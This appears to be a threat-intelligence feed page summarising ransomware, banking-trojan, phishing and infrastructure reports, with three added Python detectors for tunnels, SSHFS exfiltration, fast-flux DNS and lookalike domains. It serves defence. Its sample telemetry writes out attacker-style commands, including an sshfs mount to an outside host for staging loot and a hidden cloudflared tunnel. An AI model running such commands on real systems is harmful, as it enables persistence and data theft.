LATEST THREAT INTELLIGENCE.
Unleashing the Kraken ransomware group
Description: The Kraken ransomware group, which emerged from the remnants of the HelloKitty cartel, has been observed conducting big-game hunting and double-extortion attacks. The group exploits SMB vulnerabilities for initial access, then relies on Cloudflared tunnels for persistent remote access and SSHFS mounts for data exfiltration. Its cross-platform ransomware targets Windows, Linux and VMware ESXi hosts and includes a benchmarking mode that tests encryption performance on the victim system. The group operates a data leak site and has announced a new underground forum called 'The Last Haven Board'. The ransomware exposes extensive command-line options and uses anti-analysis techniques; it targets a wide range of file types, including SQL databases and network shares, encrypts with multiple threads, and deletes itself afterwards to evade detection and hinder forensic analysis.
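The two post-exploitation tools named above, Cloudflared for an outbound tunnel and SSHFS for a mount the operator can copy loot into, leave distinctive process-start events. The following is an added example of detection logic over such telemetry; it is not code from the report or from LevelBlue. The event schema (host, os, user, cmdline), the allowlists, the ATT&CK mapping chosen here and every sample event are assumptions constructed for the example.

```python
"""Flag Cloudflared tunnel persistence and SSHFS staging from process-start
telemetry. Added example; event schema, allowlists and samples are assumed."""
import re
import shlex
from dataclasses import dataclass

# Remote SSHFS targets an administrator is permitted to mount (assumed).
SSHFS_ALLOWED_REMOTES = {"backup.corp.example"}
# Accounts expected to run an approved cloudflared connector (assumed).
CLOUDFLARED_ALLOWED_USERS = {"cloudflared"}

# Matches the sshfs source operand: [user@]host:[path]
_SSHFS_SOURCE = re.compile(
    r"^(?:(?P<user>[^@\s:]+)@)?(?P<host>[A-Za-z0-9.\-]+):(?P<path>.*)$")


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str  # MITRE ATT&CK technique ID this check is mapped to
    detail: str


def _argv(event):
    """Tokenise the command line; Windows paths use backslashes, so POSIX
    escaping is disabled for Windows events."""
    posix = event.get("os", "linux") != "windows"
    try:
        return shlex.split(event["cmdline"], posix=posix)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        return event["cmdline"].split()


def _basename(token):
    return re.split(r"[\\/]", token.strip('"')).pop().lower()


def check_cloudflared(event):
    """A cloudflared 'tunnel' started by an unexpected account is an outbound
    backdoor that survives inbound firewall rules (T1572, Protocol Tunneling)."""
    argv = _argv(event)
    if not argv or not _basename(argv[0]).startswith("cloudflared"):
        return None
    if "tunnel" not in argv or event.get("user") in CLOUDFLARED_ALLOWED_USERS:
        return None
    inline_token = any(a == "--token" or a.startswith("--token=") for a in argv)
    return Finding(event["host"], "T1572",
                   f"cloudflared tunnel launched by '{event.get('user')}'"
                   + (" with an inline connector token" if inline_token else ""))


def check_sshfs(event):
    """sshfs mounting a remote host that is not allowlisted gives the operator
    a local path to copy data into (T1048, Exfiltration Over Alternative Protocol)."""
    argv = _argv(event)
    if not argv or _basename(argv[0]) not in ("sshfs", "sshfs.exe"):
        return None
    for operand in argv[1:]:
        m = _SSHFS_SOURCE.match(operand)
        if m:
            break
    else:
        return None
    remote = m.group("host")
    if remote in SSHFS_ALLOWED_REMOTES:
        return None
    return Finding(event["host"], "T1048",
                   f"sshfs mount of {remote}:{m.group('path') or '/'} by '{event.get('user')}'")


CHECKS = (check_cloudflared, check_sshfs)


def triage(events):
    """Run every check over every event; findings come back in event order."""
    return [f for ev in events for chk in CHECKS if (f := chk(ev)) is not None]


# Constructed sample telemetry: hosts, users and addresses are fictional
# (the IP is from the RFC 5737 documentation range).
SAMPLE_EVENTS = [
    {"host": "esxi-01", "os": "linux", "user": "root",
     "cmdline": "/tmp/.x/cloudflared tunnel run --token eyJhIjoiZmFrZSJ9"},
    {"host": "files-02", "os": "linux", "user": "root",
     "cmdline": "sshfs loot@203.0.113.10:/drop /mnt/out -o reconnect"},
    {"host": "files-02", "os": "linux", "user": "ops",
     "cmdline": "sshfs ops@backup.corp.example:/backups /mnt/backups"},
    {"host": "edge-03", "os": "linux", "user": "cloudflared",
     "cmdline": "/usr/bin/cloudflared --config /etc/cloudflared/config.yml tunnel run"},
    {"host": "ws-17", "os": "windows", "user": "CORP\\jdoe",
     "cmdline": '"C:\\Tools\\cloudflared.exe" tunnel --url http://localhost:3389'},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host:<9} {f.technique}  {f.detail}")
```

The allowlists are what keep this usable: a legitimate Cloudflare connector and a sanctioned SSHFS backup mount look identical at the process level, so the signal is "who ran it" and "where it points", not the binary name alone. On ESXi, where the cloudflared binary is never expected, an empty allowlist is appropriate.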
Created at: 2025-11-13T18:04:27.513000
Updated at: 2025-11-13T20:01:58.279000
Infrastructure of Interest: Medium Confidence Detection
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:39:42.586000
Updated at: 2025-11-13T11:44:21.078000
Infrastructure of Interest: Medium Confidence Phishing
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with phishing campaigns, targeting credential theft and fraudulent resource access. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:20:01.253000
Updated at: 2025-11-13T11:43:59.515000
Banking Trojan Abusing GitHub for Resilience
Description: A new Astaroth banking trojan campaign has been discovered abusing GitHub to host malware configurations. The infection begins with a phishing email containing a link to download a zipped Windows shortcut (LNK) file, which installs the Astaroth malware. The trojan detects when users access banking or cryptocurrency websites and steals credentials through keylogging. It exfiltrates stolen information through an Ngrok reverse proxy and falls back to GitHub to refresh its configuration when its command-and-control servers become unreachable. The malware primarily targets South American countries, with a focus on Brazil. Astaroth employs various anti-analysis techniques and targets specific banking and cryptocurrency-related sites. The GitHub repositories hosting the malicious configurations have been reported and taken down.
Created at: 2025-10-14T09:10:41.293000
Updated at: 2025-11-13T09:02:03.824000
When the monster bytes: tracking TA585 and its arsenal
Description: TA585 is a sophisticated cybercriminal threat actor that operates its entire attack chain itself, from infrastructure through email delivery to malware installation. It is notable for its custom web-injection campaigns and for the layered filtering it uses to keep payloads away from researchers and sandboxes. TA585 frequently delivers MonsterV2, a versatile malware with remote access trojan, loader, and stealer capabilities. MonsterV2 is used by multiple threat actors and avoids infecting computers in Commonwealth of Independent States (CIS) countries. The malware is actively maintained and updated, with pricing ranging from $800 to $2,000 per month. TA585's campaigns often involve compromised websites, fake CAPTCHAs, and GitHub-themed lures to deliver various payloads.
Created at: 2025-10-14T03:39:57.707000
Updated at: 2025-11-13T03:01:31.599000
Infrastructure of Interest: Medium Confidence FastFlux
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous DNS patterns, behavioral analysis of rapid IP rotation, and cross-referenced intelligence from global sinkhole data and network telemetry. The IOCs included in this pulse are associated with Fastflux networks, characterized by constantly changing IP addresses and DNS records to evade detection while maintaining resilient malicious infrastructure for phishing, malware delivery, or C2 operations. Use this data to enhance DNS-based detection rules, identify flux parent domains, and disrupt threat actor network resilience. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
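The pulse above describes fast-flux by its observable traits: many IP addresses per name, frequent rotation, short TTLs. An added example, not LevelBlue's detection logic, of scoring domains from passive-DNS style answers follows. The weights, the use of a /24 prefix as a cheap stand-in for autonomous-system diversity, the threshold and the sample answers are all assumptions; the addresses come from the RFC 5737 documentation ranges and the RFC 2544 benchmarking range and are not indicators.

```python
"""Score DNS names for fast-flux behaviour from per-lookup A-record answers.
Added example; weights, /24 proxy, threshold and sample data are assumed."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_network
from statistics import mean


@dataclass(frozen=True)
class Answer:
    ts: int      # lookup time, epoch seconds
    qname: str
    ip: str
    ttl: int


WEIGHTS = {"ips": 1.0, "nets": 3.0, "churn": 10.0, "low_ttl": 2.0}  # assumed
LOW_TTL = 300          # seconds; fluxers keep TTLs short so rotations take effect
FLUX_THRESHOLD = 20.0  # assumed cut-off on the weighted sum


def flux_features(answers):
    """Per-name features: distinct IPs, distinct /24s, the fraction of
    consecutive lookups whose answer set changed, and the mean TTL."""
    by_lookup = defaultdict(set)
    for a in answers:
        by_lookup[a.ts].add(a.ip)
    lookups = [by_lookup[t] for t in sorted(by_lookup)]
    ips = set().union(*lookups)
    # /24 is a crude proxy for network diversity; use ASN lookups in production.
    nets = {str(ip_network(f"{ip}/24", strict=False)) for ip in ips}
    changed = sum(1 for prev, cur in zip(lookups, lookups[1:]) if prev != cur)
    churn = changed / (len(lookups) - 1) if len(lookups) > 1 else 0.0
    return {"ips": len(ips), "nets": len(nets), "churn": churn,
            "mean_ttl": mean(a.ttl for a in answers)}


def flux_score(feat):
    return (WEIGHTS["ips"] * feat["ips"]
            + WEIGHTS["nets"] * feat["nets"]
            + WEIGHTS["churn"] * feat["churn"]
            + (WEIGHTS["low_ttl"] if feat["mean_ttl"] <= LOW_TTL else 0.0))


def classify(answers):
    """Group answers by name and return score, verdict and features per name."""
    per_name = defaultdict(list)
    for a in answers:
        per_name[a.qname].append(a)
    result = {}
    for qname, recs in per_name.items():
        feat = flux_features(recs)
        score = flux_score(feat)
        result[qname] = {"score": score, "flux": score >= FLUX_THRESHOLD, **feat}
    return result


def _lookups(qname, ttl, rounds):
    """Expand (ts, [ips]) rounds into Answer rows; helper for sample data."""
    return [Answer(ts, qname, ip, ttl) for ts, ips in rounds for ip in ips]


# Constructed samples. The first rotates three addresses across ten /24s every
# lookup; the second is CDN-like (short TTL, two IPs, one /24, no churn); the
# third is a stable single-homed host.
SAMPLE_ANSWERS = (
    _lookups("secure-login-update.example", 60, [
        (0,    ["198.18.1.10", "198.18.7.22", "198.19.3.5"]),
        (600,  ["198.18.1.10", "198.19.44.9", "198.18.90.17"]),
        (1200, ["198.19.44.9", "198.18.120.3", "198.19.200.77"]),
        (1800, ["198.18.250.8", "198.19.3.5", "198.18.33.61"]),
        (2400, ["198.18.7.22", "198.19.150.14", "198.18.120.3"]),
    ])
    + _lookups("www.shop.example", 60, [
        (0,    ["192.0.2.10", "192.0.2.11"]),
        (600,  ["192.0.2.11", "192.0.2.10"]),
        (1200, ["192.0.2.10", "192.0.2.11"]),
    ])
    + _lookups("mail.corp.example", 3600, [
        (0,   ["203.0.113.5"]),
        (600, ["203.0.113.5"]),
    ])
)

if __name__ == "__main__":
    for name, r in classify(SAMPLE_ANSWERS).items():
        print(f"{name:<30} score={r['score']:5.1f} flux={r['flux']} "
              f"ips={r['ips']} nets={r['nets']} churn={r['churn']:.2f}")
```

The CDN-like name scores low despite its short TTL and multiple addresses because all of them sit in one /24 and the answer set never changes; that network-diversity and churn signal is what separates flux from ordinary load balancing, and it is why a single lookup is never enough to call a name fast-flux.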
Created at: 2025-08-07T07:34:03.778000
Updated at: 2025-11-12T11:12:35.355000
Infrastructure of Interest: Medium Confidence InfoStealer
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with infostealer malware, designed to harvest sensitive data such as credentials, cookies, and financial information from compromised systems. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations involving data theft. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:31:55.617000
Updated at: 2025-11-12T11:12:33.081000
Analyzing the Link Between Two Evolving Brazilian Banking Trojans
Description: This intelligence report examines the connection between two Brazilian banking trojans, Maverick and Coyote. The malware spreads through WhatsApp, using a multi-stage attack that begins with a malicious LNK file. Both trojans share similarities in their infection methods, targeting Brazilian users and banks. The attack chain involves obfuscated PowerShell commands, downloading additional payloads from command and control servers. The malware employs anti-analysis techniques and targets specific browsers. Persistence is achieved through a batch file in the startup folder. The report provides technical details, including code samples and infection chain analysis, as well as indicators of compromise for the identified malware campaign.
Created at: 2025-11-12T09:45:13.946000
Updated at: 2025-11-12T09:47:38.934000
Thousands of Fake Hotel Domains Used in Massive Phishing Campaign
Description: A Russian-speaking threat actor has orchestrated a large-scale phishing campaign targeting travellers by registering over 4,300 domain names since early 2025. The operation impersonates major travel brands such as Airbnb and Booking.com to steal payment card data. The phishing sites serve pages customised per victim according to a unique string in the URL, use fake CAPTCHA checks, and carry multilingual translations to appear legitimate. Victims arrive via malicious emails whose links redirect through several intermediate sites before reaching the phishing page. The attacker consistently registers new domains, concentrating on specific registrars and using naming conventions that combine travel-related terms with hotel names. The phishing kit collects entered data in real time and contains Russian-language elements in its source code.
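Because the campaign above leans on recognisable naming conventions (brand names and travel terms in freshly registered domains), newly-registered-domain feeds can be triaged lexically before any infrastructure is seen. The following is an added example of such triage, not the phishing kit or any vendor's logic. The brand list, term list, weights, threshold and the naive "last two labels are the registrable domain" rule are assumptions; the sample domains are constructed under .example and are not indicators.

```python
"""Lexical triage of newly registered domains for travel-brand impersonation.
Added example; brand/term lists, weights, threshold and samples are assumed."""
import re
from dataclasses import dataclass

# Brand token -> the one registrable domain allowed to carry it (assumed list).
BRANDS = {"airbnb": "airbnb.com", "booking": "booking.com"}
# Travel words the campaign-style names lean on; matched as stems (assumed list).
TRAVEL_TERMS = ("hotel", "reservation", "guest", "stay", "checkin", "confirm", "resort", "suites")
WEIGHTS = {"brand_misuse": 6, "brand_in_subdomain": 3, "travel_term": 2, "hyphen": 1, "digits": 1}
MAX_TERM_POINTS, MAX_HYPHEN_POINTS = 6, 3
THRESHOLD = 7  # assumed review cut-off


@dataclass(frozen=True)
class Verdict:
    domain: str
    score: int
    reasons: tuple

    @property
    def suspicious(self):
        return self.score >= THRESHOLD


def split_domain(domain):
    """Return (registrable domain, subdomain labels). Naive: the last two
    labels are treated as registrable; a public-suffix list belongs here."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def score_domain(domain):
    reg, sub = split_domain(domain)
    label = reg.split(".")[0]           # the label the registrant chose
    score, reasons = 0, []
    for brand, legit in BRANDS.items():
        if brand in domain.lower() and reg != legit:
            score += WEIGHTS["brand_misuse"]
            reasons.append(f"brand '{brand}' outside {legit}")
            if any(brand in s for s in sub):   # e.g. booking.com.<junk>.example
                score += WEIGHTS["brand_in_subdomain"]
                reasons.append("brand placed in subdomain to fake the host name")
    tokens = [t for t in re.split(r"[-\d]+", label) if t]
    hits = [t for t in tokens if t.startswith(TRAVEL_TERMS)]
    if hits:
        pts = min(WEIGHTS["travel_term"] * len(hits), MAX_TERM_POINTS)
        score += pts
        reasons.append(f"travel terms {hits}")
    hyphens = min(label.count("-") * WEIGHTS["hyphen"], MAX_HYPHEN_POINTS)
    if hyphens:
        score += hyphens
        reasons.append(f"{label.count('-')} hyphen(s) in registrable label")
    if any(c.isdigit() for c in label):
        score += WEIGHTS["digits"]
        reasons.append("digits in registrable label")
    return Verdict(domain, score, tuple(reasons))


def triage(domains):
    """Score every domain, highest score first."""
    return sorted((score_domain(d) for d in domains), key=lambda v: -v.score)


# Constructed sample feed; none of these are real indicators.
SAMPLE_DOMAINS = [
    "airbnb-guest-checkin-7742.example",
    "booking.com.guest-verify.example",
    "grandplaza-hotel.example",
    "corp-payroll.example",
    "www.booking.com",
    "hotel-reservation-confirm-2025.example",
]

if __name__ == "__main__":
    for v in triage(SAMPLE_DOMAINS):
        flag = "REVIEW" if v.suspicious else "ok"
        print(f"{v.score:3d} {flag:<6} {v.domain}  {'; '.join(v.reasons)}")
```

The brand-in-subdomain rule matters more than the brand-misuse rule by itself: a name like booking.com.guest-verify.example is built so that the visible left-hand part reads as the real host, which is exactly the trick a per-victim URL string and a convincing page rely on. A score like this is a triage filter for a registrar or certificate-transparency feed, not a block decision; the hotel name part of the convention cannot be scored without a list of the hotels being impersonated, which the summary does not provide.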
Created at: 2025-11-11T18:26:17.167000
Updated at: 2025-11-11T18:31:27.495000
Infrastructure of Interest: Medium Confidence Command And Control
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with command and control (C2) infrastructure, facilitating malware communication, data exfiltration, and persistent threat actor operations. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:29:37.542000
Updated at: 2025-11-11T17:41:27.053000
